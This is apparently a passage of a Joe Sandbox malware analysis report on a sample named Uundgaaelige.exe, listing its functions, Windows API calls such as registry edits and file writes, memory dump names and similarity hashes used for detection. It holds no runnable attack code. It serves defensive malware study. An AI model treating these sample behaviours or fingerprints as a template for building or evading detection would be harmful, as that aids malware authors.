                                                  Download Yara Rule
                                                  APIs
                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040239C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023A5
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: bc1685d4ae208c1d1d23a44588ade792f4c17fe15bc88d75915684a87409a1e3
                                                  • Instruction ID: 4734060bda5bcd379add1307bf53be40299433fde06acb7bb12a187abd2f1290
                                                  • Opcode Fuzzy Hash: bc1685d4ae208c1d1d23a44588ade792f4c17fe15bc88d75915684a87409a1e3
                                                  • Instruction Fuzzy Hash: 6CF09632B04111ABD710AFB89B8EABE76A89B80354F25003FEA05B71C1DAFC4D02476D
                                                  Function 00405292 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 004052A2
                                                    • Part of subcall function 004041A6: SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 004041B8
                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004052EE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: bd9a5ddb8951e702f593d935893cbe0c9e9a33ea4b989c347e82015d2b76b38a
                                                  • Instruction ID: 87a8d658111fd0208c3f238e633952134940df41e2ee6bc8381daed66fdac0ea
                                                  • Opcode Fuzzy Hash: bd9a5ddb8951e702f593d935893cbe0c9e9a33ea4b989c347e82015d2b76b38a
                                                  • Instruction Fuzzy Hash: 22F02EB26006028BE7616780EE00B1773A0EFD0700F6A407FEE94B62F0C77808428E6C
                                                  Function 00406431 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                    • Part of subcall function 004063C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                                    • Part of subcall function 004063C3: wsprintfA.USER32 ref: 00406413
                                                    • Part of subcall function 004063C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
                                                  • Instruction ID: 56fda94a1dd54a43fb122a1991fe363568279dfba8e98efda579274c3b941564
                                                  • Opcode Fuzzy Hash: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
                                                  • Instruction Fuzzy Hash: E3E086326042105AD2106BB09E0487773A89F84750302883EF946F2140D7389C75ABAE
                                                  Function 00405C32 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\Uundgaaelige.exe,80000000,00000003), ref: 00405C36
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                  • Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
                                                  • Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                  • Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19
                                                  Function 00405C0D Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,?,00405825,?,?,00000000,00405A08,?,?,?,?), ref: 00405C12
                                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C26
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                  • Instruction ID: 434021fb132f1a115613134526c1ca1f9a267fea60db19119bc25123d282abd2
                                                  • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                  • Instruction Fuzzy Hash: 6FD0C972504121BBD2102728EE0889FBB55DB54271702CA35F8A9A26B1DB304C5A9A98
                                                  Function 00405703 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405709
                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405717
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                  • Instruction ID: 9e29868ffe2b43b7798ba1daada82999d34952ab2a4b7d437405be2737e00dc4
                                                  • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                  • Instruction Fuzzy Hash: 0DC04C30225901DADA606F249F087177994FBA0741F1144396146E30E0EA348415ED2D
                                                  Function 00405F4D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B72,00000000,?,?), ref: 00405F76
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction ID: b8b87f9e7f23a22b038ad66cb6348727c8887116b88fbbe418bbf9d15439b9dc
                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction Fuzzy Hash: B4E0E67201450DBEDF095F60DD0AD7B371DEB08304F04452EFA45D4091E7B5AD209E74
                                                  Function 00405CD9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,00411C83,0040B8D8,00403246,0040B8D8,00411C83,004138D8,00004000,?,00000000,00403070,00000004), ref: 00405CED
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                  • Instruction ID: e5327eed263ed0cb59b3772f759b7efddda8826228879d6768eb485b7ec61b42
                                                  • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                  • Instruction Fuzzy Hash: CEE0EC3225065AABDF509E95AD08FEB7B6CEF053A0F008837F915E2150D631E821DBA8
                                                  Function 00405CAA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,0040B8D8,004032C2,0040A130,0040A130,004031C6,004138D8,00004000,?,00000000,00403070), ref: 00405CBE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                  • Instruction ID: 86bb3e2151b1fdd0dbac44507bcf00ea7ca2ece369def3772f3446380bdcc129
                                                  • Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                  • Instruction Fuzzy Hash: DAE08C3220825EABEF109E508C00EEB3B6CFB00361F144432FD10E7040E230E860ABB4
                                                  Function 00405F1F Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FAD,?,?,?,?,00000002,: Completed), ref: 00405F43
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction ID: 49134d8a29c384089d71c2fc87a48e1db8574b6415c3e00dd087e3758e4bfdf5
                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction Fuzzy Hash: C1D0EC3210420ABADF119E919D01FAB371DEB04350F004426BA45E4091D779D520AE54
                                                  Function 004041A6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 004041B8
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
                                                  • Instruction ID: 55b95b209562bae9886b89f2f6925b48322e85585088ac1ac71ede26d93296ac
                                                  • Opcode Fuzzy Hash: 36dc9921a482444c8f32a3e2d649131ff3b3bcc632906422d004d469ccc3c4a4
                                                  • Instruction Fuzzy Hash: 77C09B717407017BEA208F509E4DF0777A96750701F2944397760F60D0C6F4D450DA1C
                                                  Function 004032C5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                  Function 0040418F Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageA.USER32(00000028,?,00000001,00403FBF), ref: 0040419D
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
                                                  • Instruction ID: 10cfd25431557a88665167ebbf17620150c727a9bd7140e907e4ecff4ccdfc3e
                                                  • Opcode Fuzzy Hash: 1c02a5868d14bc1e19ebeed3d404449871defacebd96b9282790bb16d711c782
                                                  • Instruction Fuzzy Hash: 30B09236280A00AAEE218B00DE09F457AA2E7A8742F028028B250240B0CAB200A1DB08
                                                  Function 0040417C Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403F58), ref: 00404186
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
